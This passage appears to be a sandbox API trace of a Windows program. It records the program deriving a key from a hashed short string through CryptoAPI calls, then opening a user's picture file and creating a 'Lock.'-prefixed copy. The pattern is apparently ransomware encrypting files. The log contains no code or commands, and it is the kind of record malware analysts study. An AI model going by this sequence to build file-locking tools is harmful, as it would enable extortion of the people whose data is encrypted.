lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.721] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0210.721] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.721] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0210.721] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.721] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.721] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.722] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.722] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.722] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.722] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.722] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.722] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.722] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.722] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.722] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0210.722] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.722] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0210.722] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.722] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.722] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0210.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aab290, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0210.722] CryptCreateHash (in: hProv=0xa7c990, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0210.722] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.722] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.722] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.722] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0210.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71d38, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0210.723] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0210.723] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0210.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71cc8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0210.723] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.723] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.723] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.723] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.723] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.723] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.723] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0210.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aab1d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0210.723] CryptHashData (hHash=0x9e2238, pbData=0x2a71bd8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0210.723] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.723] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.723] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.723] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.723] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.723] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.723] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.724] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.724] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0210.724] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.724] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0210.724] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.724] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.724] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0210.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aab260, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0210.724] CryptDeriveKey (in: hProv=0xa7c990, Algid=0x6601, hBaseData=0x9e2238, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e2078) returned 1 [0210.724] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.724] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.724] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.724] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.724] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.724] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.724] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.724] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0210.724] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.724] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0210.724] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0210.724] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0210.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7160, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0210.725] CryptDestroyHash (hHash=0x9e2238) returned 1 [0210.725] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.725] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.725] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.725] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.725] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.725] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/LloJL.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\llojl.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4dc [0210.726] SetFilePointerEx (in: hFile=0x4dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0210.726] SetFilePointerEx (in: hFile=0x4dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0210.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f71e0 [0210.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0210.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0210.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0210.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0210.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0210.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0210.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0210.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0210.727] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0210.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0210.727] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0210.727] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0210.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0210.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0210.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0210.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0210.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0210.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0210.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0210.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0210.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0210.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0210.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0210.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0210.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0210.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0210.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0210.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0210.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0210.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0210.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a74538 [0210.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0210.728] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures/" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0210.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74538 | out: hHeap=0x2af0000) returned 1 [0210.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0210.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0210.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a930 [0210.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0210.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0210.730] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/Lock.LloJL.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\lock.llojl.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x520 [0210.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6fc0 [0210.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0210.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0210.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0210.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0210.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0210.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0210.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0210.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0210.731] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0210.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0210.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0210.731] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0210.731] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0210.731] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0210.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0210.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0210.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0210.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0210.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0210.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0210.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0210.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0210.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0210.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0210.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0210.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0210.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0210.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0210.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0210.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7080 [0210.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0210.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0210.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0210.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0210.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0210.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0210.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0210.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0210.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0210.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0210.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0210.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0210.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0210.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x50e0020 [0210.735] SetFilePointerEx (in: hFile=0x4dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0210.735] ReadFile (in: hFile=0x4dc, lpBuffer=0x37c0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x37c0048*, lpNumberOfBytesRead=0x8cf4f8*=0x8889, lpOverlapped=0x0) returned 1 [0210.737] ReadFile (in: hFile=0x4dc, 